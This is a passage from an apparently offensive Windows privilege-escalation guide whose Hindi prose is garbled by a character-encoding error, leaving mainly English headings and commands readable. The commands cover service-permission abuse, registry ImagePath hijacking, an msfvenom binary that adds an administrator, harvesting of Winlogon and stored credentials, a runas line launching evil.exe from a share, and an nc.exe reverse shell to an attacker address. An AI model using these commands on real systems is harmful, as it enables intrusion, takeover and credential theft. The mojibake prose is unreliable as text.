for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

рдЖрдк sc рдФрд░ icacls рдХрд╛ рднреА рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt

Services registry modify permissions

рдЖрдкрдХреЛ рдпрд╣ рдЬрд╛рдВрдЪрдирд╛ рдЪрд╛рд╣рд┐рдП рдХрд┐ рдХреНрдпрд╛ рдЖрдк рдХрд┐рд╕реА рд╕реЗрд╡рд╛ рд░рдЬрд┐рд╕реНрдЯреНрд░реНрд░реА рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдЖрдк рдПрдХ рд╕реЗрд╡рд╛ рд░рдЬрд┐рд╕реНрдЯреНрд░реНрд░реА рдкрд░ рдЕрдкрдиреА рдЕрдиреБрдорддрд┐ рдХреА рдЬрд╛рдВрдЪ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП:

reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

рдпрд╣ рдЬрд╛рдВрдЪрдирд╛ рдЪрд╛рд╣рд┐рдП рдХрд┐ Authenticated Users рдпрд╛ NT AUTHORITY\INTERACTIVE рдХреЗ рдкрд╛рд╕ FullControl рдЕрдиреБрдорддрд┐рдпрд╛рдБ рд╣реИрдВ рдпрд╛ рдирд╣реАрдВред рдпрджрд┐ рд╣рд╛рдБ, рддреЛ рд╕реЗрд╡рд╛ рджреНрд╡рд╛рд░рд╛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдмрд╛рдЗрдирд░реА рдХреЛ рдмрджрд▓рд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

рдмрд╛рдЗрдирд░реА рдХреЗ рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рдкрде рдХреЛ рдмрджрд▓рдиреЗ рдХреЗ рд▓рд┐рдП:

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

Services registry AppendData/AddSubdirectory permissions

рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдПрдХ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдкрд░ рдпрд╣ рдЕрдиреБрдорддрд┐ рд╣реИ, рддреЛ рдЗрд╕рдХрд╛ рдорддрд▓рдм рд╣реИ рдХрд┐ рдЖрдк рдЗрд╕ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рд╕реЗ рдЙрдк рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВред Windows рд╕реЗрд╡рд╛рдУрдВ рдХреЗ рдорд╛рдорд▓реЗ рдореЗрдВ, рдпрд╣ рдордирдорд╛рдиреЗ рдХреЛрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдкрд░реНрдпрд╛рдкреНрдд рд╣реИ:

{% content-ref url="appenddata-addsubdirectory-permission-over-service-registry.md" %} appenddata-addsubdirectory-permission-over-service-registry.md {% endcontent-ref %}

Unquoted Service Paths

рдпрджрд┐ рдХрд┐рд╕реА рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдкрде рдЙрджреНрдзрд░рдг рдЪрд┐рд╣реНрдиреЛрдВ рдХреЗ рдЕрдВрджрд░ рдирд╣реАрдВ рд╣реИ, рддреЛ Windows рд╣рд░ рд╕реНрдкреЗрд╕ рд╕реЗ рдкрд╣рд▓реЗ рд╕рдорд╛рдкреНрдд рд╣реЛрдиреЗ рд╡рд╛рд▓реЗ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░реЗрдЧрд╛ред

рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдкрде C:\Program Files\Some Folder\Service.exe рдХреЗ рд▓рд┐рдП Windows рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░реЗрдЧрд╛:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

рд╕реВрдЪреАрдмрджреНрдз рдХрд░реЗрдВ рд╕рднреА рдЕрдирдЙрджреНрдзреГрдд рд╕реЗрд╡рд╛ рдкрде, рдЬреЛ рдЕрдВрддрд░реНрдирд┐рд╣рд┐рдд Windows рд╕реЗрд╡рд╛рдУрдВ рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рдирд╣реАрдВ рд╣реИрдВ:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v """ #Not only auto services

#Other way
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

рдЖрдк рдЗрд╕ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЗрд╕рдХрд╛ рд▓рд╛рдн рдЙрдард╛ рд╕рдХрддреЗ рд╣реИрдВ metasploit рдХреЗ рд╕рд╛рде: exploit/windows/local/trusted\_service\_path рдЖрдк рдореИрдиреНрдпреБрдЕрд▓ рд░реВрдк рд╕реЗ рдПрдХ рд╕реЗрд╡рд╛ рдмрд╛рдЗрдирд░реА рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВ metasploit рдХреЗ рд╕рд╛рде:

msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe

Recovery Actions

Windows рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рдпрд╣ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ рдХрд┐ рдпрджрд┐ рдХреЛрдИ рд╕реЗрд╡рд╛ рд╡рд┐рдлрд▓ рд╣реЛрддреА рд╣реИ рддреЛ рдХреНрдпрд╛ рдХрд╛рд░реНрд░рд╡рд╛рдИ рдХреА рдЬрд╛рдиреА рдЪрд╛рд╣рд┐рдПред рдЗрд╕ рд╕реБрд╡рд┐рдзрд╛ рдХреЛ рдПрдХ рдмрд╛рдЗрдирд░реА рдХреА рдУрд░ рдЗрдВрдЧрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдпрджрд┐ рдпрд╣ рдмрд╛рдЗрдирд░реА рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрдиреАрдп рд╣реИ, рддреЛ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рд╕рдВрднрд╡ рд╣реЛ рд╕рдХрддреА рд╣реИред рдЕрдзрд┐рдХ рд╡рд┐рд╡рд░рдг рдЖрдзрд┐рдХрд╛рд░рд┐рдХ рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдореЗрдВ рдкрд╛рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

Applications

Installed Applications

рдмрд╛рдЗрдирд░реА рдХреЗ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ (рд╢рд╛рдпрдж рдЖрдк рдПрдХ рдХреЛ рдЕрдзрд┐рд▓реЗрдЦрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛ рд╕рдХрддреЗ рд╣реИрдВ) рдФрд░ рдлреЛрд▓реНрдбрд░реЛрдВ (DLL Hijacking).

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Write Permissions

рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдХреНрдпрд╛ рдЖрдк рдХрд┐рд╕реА рдХреЙрдиреНрдлрд╝рд┐рдЧ рдлрд╝рд╛рдЗрд▓ рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рддрд╛рдХрд┐ рдХрд┐рд╕реА рд╡рд┐рд╢реЗрд╖ рдлрд╝рд╛рдЗрд▓ рдХреЛ рдкрдврд╝ рд╕рдХреЗрдВ рдпрд╛ рдпрджрд┐ рдЖрдк рдХрд┐рд╕реА рдмрд╛рдЗрдирд░реА рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ рдПрдХ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЦрд╛рддреЗ (schedtasks) рджреНрд╡рд╛рд░рд╛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрдиреЗ рдЬрд╛ рд░рд╣реА рд╣реИред

рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдХрдордЬреЛрд░ рдлрд╝реЛрд▓реНрдбрд░/рдлрд╝рд╛рдЗрд▓ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЛ рдЦреЛрдЬрдиреЗ рдХрд╛ рдПрдХ рддрд░реАрдХрд╛ рд╣реИ:

accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

рд╕реНрдЯрд╛рд░реНрдЯрдЕрдк рдкрд░ рдЪрд▓рд╛рдПрдБ

рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдХреНрдпрд╛ рдЖрдк рдХрд┐рд╕реА рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдпрд╛ рдмрд╛рдЗрдирд░реА рдХреЛ рдУрд╡рд░рд░рд╛рдЗрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ рдХрд┐рд╕реА рдЕрдиреНрдп рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рджреНрд╡рд╛рд░рд╛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрдиреЗ рд╡рд╛рд▓реА рд╣реИред
рдЕрдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рджрд┐рд▓рдЪрд╕реНрдк autoruns рд╕реНрдерд╛рдиреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдиреЗ рдХреЗ рд▓рд┐рдП рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкреГрд╖реНрда рдкрдврд╝реЗрдВ:

{% content-ref url="privilege-escalation-with-autorun-binaries.md" %} privilege-escalation-with-autorun-binaries.md {% endcontent-ref %}

рдбреНрд░рд╛рдЗрд╡рд░

рд╕рдВрднрд╛рд╡рд┐рдд рддреАрд╕рд░реЗ рдкрдХреНрд╖ рдХреЗ рдЕрдЬреАрдм/рдХрдордЬреЛрд░ рдбреНрд░рд╛рдЗрд╡рд░реЛрдВ рдХреА рддрд▓рд╛рд╢ рдХрд░реЗрдВ

driverquery
driverquery.exe /fo table
driverquery /SI

PATH DLL Hijacking

рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ PATH рдкрд░ рдореМрдЬреВрдж рдПрдХ рдлрд╝реЛрд▓реНрдбрд░ рдХреЗ рдЕрдВрджрд░ рд▓рд┐рдЦрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рд╣реИ рддреЛ рдЖрдк рдПрдХ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рджреНрд╡рд╛рд░рд╛ рд▓реЛрдб рдХреА рдЧрдИ DLL рдХреЛ рд╣рд╛рдИрдЬреИрдХ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЕрдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛ рд╕рдХрддреЗ рд╣реИрдВред

PATH рдХреЗ рдЕрдВрджрд░ рд╕рднреА рдлрд╝реЛрд▓реНрдбрд░реЛрдВ рдХреА рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ:

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП рдХрд┐ рдЗрд╕ рдЪреЗрдХ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХреИрд╕реЗ рдХрд░реЗрдВ:

{% content-ref url="dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md" %} writable-sys-path-+dll-hijacking-privesc.md {% endcontent-ref %}

рдиреЗрдЯрд╡рд░реНрдХ

рд╢реЗрдпрд░

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

hosts file

hosts рдлрд╝рд╛рдЗрд▓ рдкрд░ рд╣рд╛рд░реНрдбрдХреЛрдбреЗрдб рдЕрдиреНрдп рдЬреНрдЮрд╛рдд рдХрдВрдкреНрдпреВрдЯрд░реЛрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ

type C:\Windows\System32\drivers\etc\hosts

рдиреЗрдЯрд╡рд░реНрдХ рдЗрдВрдЯрд░рдлреЗрд╕ рдФрд░ DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

Open Ports

рдмрд╛рд╣рд░ рд╕реЗ рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рд╕реЗрд╡рд╛рдУрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ

netstat -ano #Opened ports?

рд░реВрдЯрд┐рдВрдЧ рддрд╛рд▓рд┐рдХрд╛

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

ARP рддрд╛рд▓рд┐рдХрд╛

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдирд┐рдпрдо

рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рдХрдорд╛рдВрдб рдХреЗ рд▓рд┐рдП рдЗрд╕ рдкреГрд╖реНрда рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ (рдирд┐рдпрдореЛрдВ рдХреА рд╕реВрдЪреА, рдирд┐рдпрдо рдмрдирд╛рдирд╛, рдмрдВрдж рдХрд░рдирд╛, рдмрдВрдж рдХрд░рдирд╛...)

рдпрд╣рд╛рдБ рдФрд░ рдиреЗрдЯрд╡рд░реНрдХ рдПрдиреНрдпреВрдорд░реЗрд╢рди рдХреЗ рд▓рд┐рдП рдХрдорд╛рдВрдб

рд╡рд┐рдВрдбреЛрдЬрд╝ рд╕рдмрд╕рд┐рд╕реНрдЯрдо рдлреЙрд░ рд▓рд┐рдирдХреНрд╕ (wsl)

C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe

рдмрд╛рдЗрдирд░реА bash.exe рднреА C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe рдореЗрдВ рдкрд╛рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

рдпрджрд┐ рдЖрдк рд░реВрдЯ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкреНрд░рд╛рдкреНрдд рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рдЖрдк рдХрд┐рд╕реА рднреА рдкреЛрд░реНрдЯ рдкрд░ рд╕реБрди рд╕рдХрддреЗ рд╣реИрдВ (рдЬрдм рдЖрдк рдкрд╣рд▓реА рдмрд╛рд░ nc.exe рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдХрд┐рд╕реА рдкреЛрд░реНрдЯ рдкрд░ рд╕реБрдирддреЗ рд╣реИрдВ, рддреЛ рдпрд╣ GUI рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкреВрдЫреЗрдЧрд╛ рдХрд┐ рдХреНрдпрд╛ nc рдХреЛ рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рджреНрд╡рд╛рд░рд╛ рдЕрдиреБрдорддрд┐ рджреА рдЬрд╛рдиреА рдЪрд╛рд╣рд┐рдП)ред

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

рдмрд╢ рдХреЛ рд░реВрдЯ рдХреЗ рд░реВрдк рдореЗрдВ рдЖрд╕рд╛рдиреА рд╕реЗ рд╢реБрд░реВ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдк --default-user root рдЖрдЬрдорд╛ рд╕рдХрддреЗ рд╣реИрдВред

рдЖрдк WSL рдлрд╝рд╛рдЗрд▓ рд╕рд┐рд╕реНрдЯрдо рдХреЛ рдлрд╝реЛрд▓реНрдбрд░ C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\ рдореЗрдВ рдЦреЛрдЬ рд╕рдХрддреЗ рд╣реИрдВред

Windows рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕

Winlogon рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

Credentials manager / Windows vault

From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
Windows Vault рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЛ рд╕рд░реНрд╡рд░реЛрдВ, рд╡реЗрдмрд╕рд╛рдЗрдЯреЛрдВ рдФрд░ рдЕрдиреНрдп рдХрд╛рд░реНрдпрдХреНрд░рдореЛрдВ рдХреЗ рд▓рд┐рдП рд╕рдВрдЧреНрд░рд╣реАрдд рдХрд░рддрд╛ рд╣реИ рдЬрд┐рдирдореЗрдВ Windows рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рд▓реЙрдЧ рдЗрди рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдкрд╣рд▓реЗ рджреГрд╖реНрдЯрд┐рдХреЛрдг рдореЗрдВ, рдпрд╣ рдРрд╕рд╛ рд▓рдЧ рд╕рдХрддрд╛ рд╣реИ рдХрд┐ рдЕрдм рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдкрдиреЗ рдлреЗрд╕рдмреБрдХ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕, рдЯреНрд╡рд┐рдЯрд░ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕, рдЬреАрдореЗрд▓ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдЖрджрд┐ рдХреЛ рд╕рдВрдЧреНрд░рд╣реАрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рддрд╛рдХрд┐ рд╡реЗ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдмреНрд░рд╛рдЙрдЬрд╝рд░реЛрдВ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд▓реЙрдЧ рдЗрди рдХрд░ рд╕рдХреЗрдВред рд▓реЗрдХрд┐рди рдРрд╕рд╛ рдирд╣реАрдВ рд╣реИред

Windows Vault рдЙрди рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЛ рд╕рдВрдЧреНрд░рд╣реАрдд рдХрд░рддрд╛ рд╣реИ рдЬрд┐рдирд╕реЗ Windows рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рд▓реЙрдЧ рдЗрди рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рдЬрд┐рд╕рдХрд╛ рдЕрд░реНрде рд╣реИ рдХрд┐ рдХреЛрдИ рднреА Windows рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдЬрд┐рд╕реЗ рдХрд┐рд╕реА рд╕рдВрд╕рд╛рдзрди (рд╕рд░реНрд╡рд░ рдпрд╛ рд╡реЗрдмрд╕рд╛рдЗрдЯ) рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ рдЗрд╕ Credential Manager рдФрд░ Windows Vault рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рджреНрд╡рд╛рд░рд╛ рдмрд╛рд░-рдмрд╛рд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рджрд░реНрдЬ рдХрд░рдиреЗ рдХреЗ рдмрдЬрд╛рдп рдкреНрд░рджрд╛рди рдХрд┐рдП рдЧрдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддрд╛ рд╣реИред

рдЬрдм рддрдХ рдПрдкреНрд▓рд┐рдХреЗрд╢рди Credential Manager рдХреЗ рд╕рд╛рде рдЗрдВрдЯрд░реИрдХреНрдЯ рдирд╣реАрдВ рдХрд░рддреЗ, рдореБрдЭреЗ рдирд╣реАрдВ рд▓рдЧрддрд╛ рдХрд┐ рдЙрдирдХреЗ рд▓рд┐рдП рдХрд┐рд╕реА рджрд┐рдП рдЧрдП рд╕рдВрд╕рд╛рдзрди рдХреЗ рд▓рд┐рдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рд╕рдВрднрд╡ рд╣реИред рдЗрд╕рд▓рд┐рдП, рдпрджрд┐ рдЖрдкрдХрд╛ рдПрдкреНрд▓рд┐рдХреЗрд╢рди рд╡реЙрд▓реНрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рдЪрд╛рд╣рддрд╛ рд╣реИ, рддреЛ рдЗрд╕реЗ рдХрд┐рд╕реА рди рдХрд┐рд╕реА рддрд░рд╣ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдореИрдиреЗрдЬрд░ рдХреЗ рд╕рд╛рде рд╕рдВрд╡рд╛рдж рдХрд░рдирд╛ рдЪрд╛рд╣рд┐рдП рдФрд░ рдЙрд╕ рд╕рдВрд╕рд╛рдзрди рдХреЗ рд▓рд┐рдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдирд╛ рдЪрд╛рд╣рд┐рдП рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд╕реНрдЯреЛрд░реЗрдЬ рд╡реЙрд▓реНрдЯ рд╕реЗред

рдорд╢реАрди рдкрд░ рд╕рдВрдЧреНрд░рд╣реАрдд рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреА рд╕реВрдЪреА рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП cmdkey рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВред

cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

рдлрд┐рд░ рдЖрдк /savecred рд╡рд┐рдХрд▓реНрдкреЛрдВ рдХреЗ рд╕рд╛рде runas рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рддрд╛рдХрд┐ рд╕рд╣реЗрдЬреЗ рдЧрдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХреЗред рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЙрджрд╛рд╣рд░рдг рдПрдХ SMB рд╢реЗрдпрд░ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ рджреВрд░рд╕реНрде рдмрд╛рдЗрдирд░реА рдХреЛ рдХреЙрд▓ рдХрд░ рд░рд╣рд╛ рд╣реИред

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

runas рдХрд╛ рдЙрдкрдпреЛрдЧ рдПрдХ рдкреНрд░рджрд╛рди рдХрд┐рдП рдЧрдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рд╕реЗрдЯ рдХреЗ рд╕рд╛рдеред

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Note that mimikatz, lazagne, credentialfileview, VaultPasswordView, or from Empire Powershells module.

DPAPI

